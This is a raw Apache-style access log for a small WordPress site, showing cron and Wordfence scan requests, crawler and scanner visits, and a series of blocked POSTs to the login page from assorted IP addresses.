103.4.122.14 - - [12/Jan/2026:16:25:10 +0800] "POST /wp-cron.php?doing_wp_cron=1768206310.3108348846435546875000 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [12/Jan/2026:16:24:51 +0800] "GET /wp-admin/admin-ajax.php?action=wordfence_doScan&isFork=1&scanMode=standard&cronKey=f50c92720e3d329c018f965b14c85f04&signature=500fc6419e5056638023638cf0fc7863e62f2b4d56eb7240cbcec9bd58022e56 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [12/Jan/2026:16:25:28 +0800] "POST /wp-cron.php?doing_wp_cron=1768206328.3294379711151123046875 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [12/Jan/2026:16:25:09 +0800] "GET /wp-admin/admin-ajax.php?action=wordfence_doScan&isFork=1&scanMode=standard&cronKey=c5755c3814bc6b00a96759edbd473934&signature=55ba5ece4dcd771b86b6c8ddb780215315d19d0cb3c4aefca1e161e7fcb9f396 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [12/Jan/2026:16:25:46 +0800] "POST /wp-cron.php?doing_wp_cron=1768206346.3371489048004150390625 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [12/Jan/2026:16:25:27 +0800] "GET /wp-admin/admin-ajax.php?action=wordfence_doScan&isFork=1&scanMode=standard&cronKey=771e9c88df8b1ede8d4a9ae0719342c1&signature=d14690cf1d6415c98bc268fdcc89733d84180c7670d6d8e9e33d3e8768d263a8 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [12/Jan/2026:16:26:04 +0800] "POST /wp-cron.php?doing_wp_cron=1768206364.3125450611114501953125 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [12/Jan/2026:16:25:45 +0800] "GET /wp-admin/admin-ajax.php?action=wordfence_doScan&isFork=1&scanMode=standard&cronKey=29aa9a583f5eb6673932c93cb8b27697&signature=8eba30110b916ea15884ec988e00c7235f908819f42c95cf08de35aa9f10fefb HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [12/Jan/2026:16:26:21 +0800] "POST /wp-cron.php?doing_wp_cron=1768206381.2993569374084472656250 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [12/Jan/2026:16:26:03 +0800] "GET /wp-admin/admin-ajax.php?action=wordfence_doScan&isFork=1&scanMode=standard&cronKey=198a7419f375c0359107aee35f1ec3ee&signature=79d960f2307d662c6015797a3535fc88abafcc1d7c416217713c963e28e5c0c3 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
13.239.192.158 - - [12/Jan/2026:17:30:00 +0800] "POST /wp-login.php HTTP/1.1" 503 7315 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:44.0) Gecko/20100101 Firefox/44.0"
103.4.122.14 - - [12/Jan/2026:18:21:00 +0800] "POST /wp-cron.php?doing_wp_cron=1768213259.9903349876403808593750 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
129.232.249.235 - - [12/Jan/2026:18:20:55 +0800] "POST /wp-login.php HTTP/1.1" 503 7315 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0"
103.4.122.14 - - [12/Jan/2026:20:08:33 +0800] "POST /wp-cron.php?doing_wp_cron=1768219713.4888479709625244140625 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
46.229.251.90 - - [12/Jan/2026:20:08:31 +0800] "GET /post HTTP/1.1" 404 10861 "-" "Mozilla/5.0 (compatible; WixPostScanner/TXT-FAST-1.0)"
207.246.255.44 - - [12/Jan/2026:20:08:39 +0800] "POST / HTTP/1.1" 200 44 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36"
23.94.202.10 - - [12/Jan/2026:20:13:41 +0800] "POST /wp-login.php HTTP/1.1" 503 7313 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0"
103.4.122.14 - - [12/Jan/2026:21:10:59 +0800] "POST /wp-cron.php?doing_wp_cron=1768223459.4989581108093261718750 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
41.203.18.35 - - [12/Jan/2026:21:10:54 +0800] "POST /wp-login.php HTTP/1.1" 503 7314 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0"
103.4.122.14 - - [12/Jan/2026:22:01:19 +0800] "POST /wp-cron.php?doing_wp_cron=1768226479.3580501079559326171875 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
64.15.129.121 - - [12/Jan/2026:22:01:17 +0800] "GET / HTTP/1.1" 301 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36"
192.175.111.251 - - [12/Jan/2026:22:01:20 +0800] "GET / HTTP/1.1" 200 86984 "http://nutritaste.com.au/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36"
103.4.122.14 - - [12/Jan/2026:22:01:23 +0800] "POST /wp-cron.php?doing_wp_cron=1768226483.5348460674285888671875 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
64.15.129.115 - - [12/Jan/2026:22:01:22 +0800] "GET / HTTP/1.1" 301 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36"
192.175.111.247 - - [12/Jan/2026:22:01:24 +0800] "GET / HTTP/1.1" 200 86984 "http://nutritaste.com.au/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36"
103.4.122.14 - - [12/Jan/2026:22:01:27 +0800] "POST /wp-cron.php?doing_wp_cron=1768226487.3200590610504150390625 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
192.175.111.240 - - [12/Jan/2026:22:01:25 +0800] "GET /favicon.ico HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36"
192.175.111.235 - - [12/Jan/2026:22:01:28 +0800] "GET /wp-content/uploads/2025/03/cropped-NutriTaste-favicon2-32x32.png HTTP/1.1" 200 1243 "http://nutritaste.com.au/favicon.ico" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36"
192.175.111.242 - - [12/Jan/2026:22:01:29 +0800] "GET /wp-content/uploads/2025/03/cropped-NutriTaste-favicon2-32x32.png HTTP/1.1" 200 1243 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36"
64.15.129.104 - - [12/Jan/2026:22:01:30 +0800] "GET /wp-content/uploads/2025/03/cropped-NutriTaste-favicon2-192x192.png HTTP/1.1" 200 11647 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36"
64.15.129.110 - - [12/Jan/2026:22:01:31 +0800] "GET /wp-content/uploads/2025/03/cropped-NutriTaste-favicon2-180x180.png HTTP/1.1" 200 10524 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36"
103.4.122.14 - - [12/Jan/2026:22:01:34 +0800] "POST /wp-cron.php?doing_wp_cron=1768226494.8929989337921142578125 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
64.15.129.124 - - [12/Jan/2026:22:01:33 +0800] "GET / HTTP/1.1" 301 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36"
192.175.111.244 - - [12/Jan/2026:22:01:36 +0800] "GET / HTTP/1.1" 200 86984 "http://nutritaste.com.au/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36"
64.15.129.114 - - [12/Jan/2026:22:01:37 +0800] "GET / HTTP/1.1" 200 86984 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36"
103.4.122.14 - - [12/Jan/2026:22:01:40 +0800] "POST /wp-cron.php?doing_wp_cron=1768226500.2047910690307617187500 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
192.175.111.232 - - [12/Jan/2026:22:01:38 +0800] "GET / HTTP/1.1" 301 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36"
192.175.111.253 - - [12/Jan/2026:22:01:41 +0800] "GET / HTTP/1.1" 200 86984 "http://nutritaste.com.au/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36"
64.15.129.119 - - [12/Jan/2026:22:01:43 +0800] "GET /wp-content/uploads/2025/03/NutriTaste-strap-v2-min.png HTTP/1.1" 200 27551 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36"
64.15.129.111 - - [12/Jan/2026:22:01:44 +0800] "GET /wp-content/uploads/2025/02/NutriTaste-strap-v3.png HTTP/1.1" 200 29289 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36"
103.4.122.14 - - [12/Jan/2026:23:09:24 +0800] "POST /wp-cron.php?doing_wp_cron=1768230564.8609249591827392578125 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
147.135.95.225 - - [12/Jan/2026:23:09:21 +0800] "POST /wp-login.php HTTP/1.1" 503 7314 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0"
103.4.122.14 - - [12/Jan/2026:23:09:30 +0800] "POST /wp-cron.php?doing_wp_cron=1768230570.3560090065002441406250 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [12/Jan/2026:23:09:28 +0800] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 21 "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [13/Jan/2026:00:04:40 +0800] "POST /wp-cron.php?doing_wp_cron=1768233880.0362739562988281250000 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
5.39.65.19 - - [13/Jan/2026:00:04:35 +0800] "POST /wp-login.php HTTP/1.1" 503 7314 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0"
162.142.125.38 - - [13/Jan/2026:00:12:32 +0800] "GET / HTTP/1.1" 200 16720 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
162.142.125.38 - - [13/Jan/2026:00:12:34 +0800] "GET /wp-content/uploads/2025/03/cropped-NutriTaste-favicon2-32x32.png HTTP/1.1" 200 1243 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
162.142.125.38 - - [13/Jan/2026:00:12:35 +0800] "GET /wp-content/uploads/2025/03/cropped-NutriTaste-favicon2-192x192.png HTTP/1.1" 200 11647 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
162.142.125.38 - - [13/Jan/2026:00:12:36 +0800] "GET /wp-content/uploads/2025/03/cropped-NutriTaste-favicon2-180x180.png HTTP/1.1" 200 10524 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
103.4.122.14 - - [13/Jan/2026:00:12:39 +0800] "POST /wp-cron.php?doing_wp_cron=1768234359.3706879615783691406250 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
162.142.125.38 - - [13/Jan/2026:00:12:37 +0800] "GET /favicon.ico HTTP/1.1" 302 - "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
54.39.203.162 - - [13/Jan/2026:00:12:39 +0800] "GET /robots.txt HTTP/1.1" 200 69 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
162.142.125.38 - - [13/Jan/2026:00:12:40 +0800] "GET /wp-content/uploads/2025/03/cropped-NutriTaste-favicon2-32x32.png HTTP/1.1" 200 1243 "https://nutritaste.com.au/favicon.ico" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
103.4.122.14 - - [13/Jan/2026:00:12:43 +0800] "POST /wp-cron.php?doing_wp_cron=1768234363.7400009632110595703125 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [13/Jan/2026:00:12:42 +0800] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 21 "-" "WordPress/6.9; https://nutritaste.com.au"
54.39.89.98 - - [13/Jan/2026:00:12:44 +0800] "GET / HTTP/1.1" 200 16720 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
103.4.122.14 - - [13/Jan/2026:00:45:02 +0800] "POST /wp-cron.php?doing_wp_cron=1768236302.9219338893890380859375 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
64.15.129.119 - - [13/Jan/2026:00:45:00 +0800] "GET / HTTP/1.1" 301 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36"
192.175.111.248 - - [13/Jan/2026:00:45:04 +0800] "GET / HTTP/1.1" 200 86984 "http://www.nutritaste.com.au/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:00:45:07 +0800] "POST /wp-cron.php?doing_wp_cron=1768236307.4087638854980468750000 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
64.15.129.110 - - [13/Jan/2026:00:45:05 +0800] "GET / HTTP/1.1" 301 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36"
192.175.111.235 - - [13/Jan/2026:00:45:08 +0800] "GET / HTTP/1.1" 200 86984 "http://www.nutritaste.com.au/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:00:45:11 +0800] "POST /wp-cron.php?doing_wp_cron=1768236311.3829319477081298828125 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
64.15.129.102 - - [13/Jan/2026:00:45:09 +0800] "GET /favicon.ico HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36"
192.175.111.247 - - [13/Jan/2026:00:45:12 +0800] "GET /wp-content/uploads/2025/03/cropped-NutriTaste-favicon2-32x32.png HTTP/1.1" 200 1243 "http://www.nutritaste.com.au/favicon.ico" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36"
192.175.111.229 - - [13/Jan/2026:00:45:13 +0800] "GET /wp-content/uploads/2025/03/cropped-NutriTaste-favicon2-32x32.png HTTP/1.1" 200 1243 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36"
64.15.129.110 - - [13/Jan/2026:00:45:14 +0800] "GET /wp-content/uploads/2025/03/cropped-NutriTaste-favicon2-192x192.png HTTP/1.1" 200 11647 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36"
192.175.111.254 - - [13/Jan/2026:00:45:15 +0800] "GET /wp-content/uploads/2025/03/cropped-NutriTaste-favicon2-180x180.png HTTP/1.1" 200 10524 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:00:45:18 +0800] "POST /wp-cron.php?doing_wp_cron=1768236318.5998680591583251953125 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
192.175.111.251 - - [13/Jan/2026:00:45:16 +0800] "GET / HTTP/1.1" 301 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36"
192.175.111.247 - - [13/Jan/2026:00:45:19 +0800] "GET / HTTP/1.1" 200 86984 "http://www.nutritaste.com.au/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:00:45:22 +0800] "POST /wp-cron.php?doing_wp_cron=1768236322.7662799358367919921875 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
192.175.111.233 - - [13/Jan/2026:00:45:21 +0800] "GET / HTTP/1.1" 301 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36"
192.175.111.245 - - [13/Jan/2026:00:45:24 +0800] "GET / HTTP/1.1" 200 86984 "https://www.nutritaste.com.au/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:00:45:26 +0800] "POST /wp-cron.php?doing_wp_cron=1768236326.7245180606842041015625 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
192.175.111.244 - - [13/Jan/2026:00:45:25 +0800] "GET / HTTP/1.1" 301 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36"
192.175.111.248 - - [13/Jan/2026:00:45:28 +0800] "GET / HTTP/1.1" 200 86984 "http://www.nutritaste.com.au/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36"
192.175.111.238 - - [13/Jan/2026:00:45:29 +0800] "GET /wp-content/uploads/2025/03/NutriTaste-strap-v2-min.png HTTP/1.1" 200 27551 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36"
192.175.111.238 - - [13/Jan/2026:00:45:31 +0800] "GET /wp-content/uploads/2025/02/NutriTaste-strap-v3.png HTTP/1.1" 200 29289 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:01:00:32 +0800] "POST /wp-cron.php?doing_wp_cron=1768237232.9834570884704589843750 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
154.3.236.202 - - [13/Jan/2026:01:00:30 +0800] "GET /wp-json/wp/v2/posts HTTP/1.1" 200 22 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:01:01:17 +0800] "POST /wp-cron.php?doing_wp_cron=1768237277.3717460632324218750000 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
62.171.134.16 - - [13/Jan/2026:01:01:13 +0800] "POST /wp-login.php HTTP/1.1" 503 7314 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0"
103.4.122.14 - - [13/Jan/2026:01:29:39 +0800] "POST /wp-cron.php?doing_wp_cron=1768238979.7906401157379150390625 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
66.249.79.233 - - [13/Jan/2026:01:29:37 +0800] "GET /robots.txt HTTP/1.1" 200 69 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.79.235 - - [13/Jan/2026:01:29:40 +0800] "GET /games/%E0%B8%9A%E0%B8%AD%E0%B8%A5%20%E0%B8%A7%E0%B8%B1%E0%B8%99%E0%B8%99%E0%B8%B5%E0%B9%89%20%E0%B8%AA%E0%B8%94.html HTTP/1.1" 404 10904 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.7499.169 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
38.41.33.235 - - [13/Jan/2026:01:31:55 +0800] "GET / HTTP/1.1" 200 16720 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.6 Safari/537.11"
103.4.122.14 - - [13/Jan/2026:01:52:32 +0800] "POST /wp-cron.php?doing_wp_cron=1768240352.5157620906829833984375 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
44.193.43.224 - - [13/Jan/2026:01:52:28 +0800] "POST /wp-login.php HTTP/1.1" 503 7314 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0"
176.117.107.157 - - [13/Jan/2026:02:10:16 +0800] "GET / HTTP/1.1" 200 16720 "-" "Mozilla/5.0"
103.4.122.14 - - [13/Jan/2026:02:52:29 +0800] "POST /wp-cron.php?doing_wp_cron=1768243949.7802278995513916015625 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
69.163.206.7 - - [13/Jan/2026:02:52:25 +0800] "POST /wp-login.php HTTP/1.1" 503 7314 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0"
103.4.122.14 - - [13/Jan/2026:02:53:40 +0800] "POST /wp-cron.php?doing_wp_cron=1768244020.2896049022674560546875 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
175.178.6.115 - - [13/Jan/2026:02:53:38 +0800] "GET /wp-json/wp/v2/posts HTTP/1.1" 200 22 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:03:02:45 +0800] "POST /wp-cron.php?doing_wp_cron=1768244565.5965650081634521484375 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
111.79.111.126 - - [13/Jan/2026:03:02:43 +0800] "GET /wp-json/wp/v2/posts HTTP/1.1" 200 22 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:03:36:45 +0800] "POST /wp-cron.php?doing_wp_cron=1768246605.3123350143432617187500 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
189.161.0.115 - - [13/Jan/2026:03:36:43 +0800] "GET /robots.txt HTTP/1.1" 200 69 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.43"
103.4.122.14 - - [13/Jan/2026:03:36:50 +0800] "POST /wp-cron.php?doing_wp_cron=1768246610.2317790985107421875000 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [13/Jan/2026:03:36:48 +0800] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 21 "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [13/Jan/2026:03:47:34 +0800] "POST /wp-cron.php?doing_wp_cron=1768247254.5969660282135009765625 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
144.217.252.106 - - [13/Jan/2026:03:47:30 +0800] "POST /wp-login.php HTTP/1.1" 503 7314 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0"
103.4.122.14 - - [13/Jan/2026:04:03:55 +0800] "POST /wp-cron.php?doing_wp_cron=1768248235.5652930736541748046875 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
162.142.125.36 - - [13/Jan/2026:04:03:53 +0800] "GET / HTTP/1.1" 301 - "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
162.142.125.36 - - [13/Jan/2026:04:03:57 +0800] "GET / HTTP/1.1" 200 16720 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
162.142.125.36 - - [13/Jan/2026:04:03:59 +0800] "GET /wp-content/uploads/2025/03/cropped-NutriTaste-favicon2-32x32.png HTTP/1.1" 200 1243 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
162.142.125.36 - - [13/Jan/2026:04:04:00 +0800] "GET /wp-content/uploads/2025/03/cropped-NutriTaste-favicon2-192x192.png HTTP/1.1" 200 11647 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
162.142.125.36 - - [13/Jan/2026:04:04:00 +0800] "GET /wp-content/uploads/2025/03/cropped-NutriTaste-favicon2-180x180.png HTTP/1.1" 200 10524 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
103.4.122.14 - - [13/Jan/2026:04:04:03 +0800] "POST /wp-cron.php?doing_wp_cron=1768248243.7090148925781250000000 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
162.142.125.36 - - [13/Jan/2026:04:04:02 +0800] "GET /favicon.ico HTTP/1.1" 302 - "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
162.142.125.36 - - [13/Jan/2026:04:04:05 +0800] "GET /wp-content/uploads/2025/03/cropped-NutriTaste-favicon2-32x32.png HTTP/1.1" 200 1243 "https://nutritaste.com.au/favicon.ico" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
37.19.210.4 - - [13/Jan/2026:04:09:17 +0800] "GET / HTTP/1.1" 200 16720 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:04:09:22 +0800] "POST /wp-cron.php?doing_wp_cron=1768248561.9410409927368164062500 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
37.19.210.4 - - [13/Jan/2026:04:09:19 +0800] "GET /favicon.ico HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
37.19.210.4 - - [13/Jan/2026:04:09:23 +0800] "GET /wp-content/uploads/2025/03/cropped-NutriTaste-favicon2-32x32.png HTTP/1.1" 200 1243 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:04:44:59 +0800] "POST /wp-cron.php?doing_wp_cron=1768250699.7919828891754150390625 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
91.185.191.211 - - [13/Jan/2026:04:44:45 +0800] "POST /wp-login.php HTTP/1.1" 503 7314 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0"
103.4.122.14 - - [13/Jan/2026:05:38:10 +0800] "POST /wp-cron.php?doing_wp_cron=1768253890.4539880752563476562500 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
167.71.32.67 - - [13/Jan/2026:05:38:05 +0800] "POST /wp-login.php HTTP/1.1" 503 7314 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:43.0) Gecko/20100101 Firefox/43.0"
103.4.122.14 - - [13/Jan/2026:07:21:46 +0800] "POST /wp-cron.php?doing_wp_cron=1768260106.4707720279693603515625 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
